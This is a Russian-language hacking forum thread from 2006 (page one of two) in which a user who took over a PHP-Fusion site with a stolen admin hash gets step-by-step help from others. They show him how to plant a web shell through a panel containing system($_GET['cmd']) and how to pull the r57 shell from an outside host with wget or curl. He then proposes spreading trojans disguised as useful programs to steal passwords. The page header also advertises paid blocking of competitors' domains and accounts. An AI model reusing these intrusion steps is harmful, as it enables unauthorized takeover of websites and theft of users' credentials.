Форум АНТИЧАТ - php-fusion v6.00.306 помогите чайнику

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
php-fusion v6.00.306 помогите чайнику

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

php-fusion v6.00.306 помогите чайнику

03.06.2006, 16:59

firemen

Новичок

Регистрация: 03.06.2006

Сообщений: 22

Провел на форуме:
79448

Репутация: 1

php-fusion v6.00.306 помогите чайнику

Сплойтом получил хеш админа, подставил в куки и имею полный доступ в php-fusion.
Подскажите как теперь можно залить скрипт пхп тот же "remview"?

03.06.2006, 17:00

GreenBear

наркоман с медалью

Регистрация: 07.05.2005

Сообщений: 3,704

Провел на форуме:
19975136

Репутация: 4536

Отправить сообщение для GreenBear с помощью ICQ

рарзеши в админке приатачивать файлы и добавь расширение .php
потом создавай пост, атач шелл и жми на него =)

__________________
Фреймворк для спамера :(
Услуги программирования

03.06.2006, 17:16

firemen

Новичок

Регистрация: 03.06.2006

Сообщений: 22

Провел на форуме:
79448

Репутация: 1

пробовал, запрещает запускать скрипты оттуда куда сохраняет атач

03.06.2006, 17:25

firemen

Новичок

Регистрация: 03.06.2006

Сообщений: 22

Провел на форуме:
79448

Репутация: 1

Директория, хранящая CGI приложение, доступна на запись другим пользователям. Права на директорию должны быть 0755 или 0711

English description
directory is writable by others: (/home/l/XXXXXXX.hut1.ru/WWW/forum/attachments)

03.06.2006, 17:26

GreenBear

наркоман с медалью

Регистрация: 07.05.2005

Сообщений: 3,704

Провел на форуме:
19975136

Репутация: 4536

Тогда иди в управление панелями - создать новую, содержание типа

PHP код:


		
			
system($_GET['cmd']);

включи и ок =)

__________________
Фреймворк для спамера :(
Услуги программирования

03.06.2006, 17:29

firemen

Новичок

Регистрация: 03.06.2006

Сообщений: 22

Провел на форуме:
79448

Репутация: 1

спасибо ща проверю

03.06.2006, 18:12

firemen

Новичок

Регистрация: 03.06.2006

Сообщений: 22

Провел на форуме:
79448

Репутация: 1

Использовал: system('wget -o /home/l/xxxxx.hut1.ru/WWW/forum/1.php http://rst.void.ru/download/r57shell.txt');

А что это значит, вместо скрипта (http://xxxxx.hut1.ru/forum/1.php) эта муть получилась:

--18:10:05-- http://rst.void.ru:80/download/r57shell.txt => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 2) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 3) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 4) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 5) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 6) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 7) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 8) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 9) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:10) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:11) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:12) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:13) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:14) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:15) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:16) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:17) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:18) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:19) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:20) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Giving up.

04.06.2006, 01:05

*Van*

Постоянный

Регистрация: 14.08.2005

Сообщений: 378

Провел на форуме:
670862

Репутация: 54

Отправить сообщение для *Van* с помощью ICQ

Попробуй другие качалки кроме wget. Например curl.
curl --output /home/l/xxxxx.hut1.ru/WWW/forum/1.php http://rst.void.ru/download/r57shell.txt

04.06.2006, 03:44

hidden

Постоянный

Регистрация: 23.04.2006

Сообщений: 622

Провел на форуме:
5887054

Репутация: 1292

А зачем пхп шел закачивать? Нельзя чтоли сразу вписать как

Цитата:

system($_GET['cmd']);

А что дальше?

#10

08.06.2006, 15:56

firemen

Новичок

Регистрация: 03.06.2006

Сообщений: 22

Провел на форуме:
79448

Репутация: 1

А что дальше?

Цитата:

Сообщение от *Van*

Попробуй другие качалки кроме wget. Например curl.
curl --output /home/l/xxxxx.hut1.ru/WWW/forum/1.php http://rst.void.ru/download/r57shell.txt

Нет там других закачек.

Я просто с аттачмента перенес шелл в нужну с правами папку.

Теперь встал второй вопрос - А ЧТО ДАЛЬШЕ

?

Всё грохать или дефейсить безпонту.
Что бы Вы посоветовали теперь толкового придумать что бы хоть что-то поиметь с этого?

Я уж и не знаю, может скрипт или какого трояна под видом нужной проги выложить что бы пароли с инета какие есть потырить или ещё чего.
Подло конечно это, но ради учебы и познаний на практике, компьютерный Бог возможно и простит за это

Где можно найти исходники желательно на дельфях троянов и прочей гадости?

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Books PHP	FRAGNATIC	PHP, PERL, MySQL, JavaScript	186	21.02.2010 02:41
На PHP, как на "Новые ворота"...	Mertvii-Listopad	Чужие Статьи	7	18.09.2006 12:42
Безопасность в Php, Часть Iii	k00p3r	Чужие Статьи	0	11.07.2005 19:02
Защищаем Php. Шаг за шагом.	k00p3r	Чужие Статьи	0	13.06.2005 11:31

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход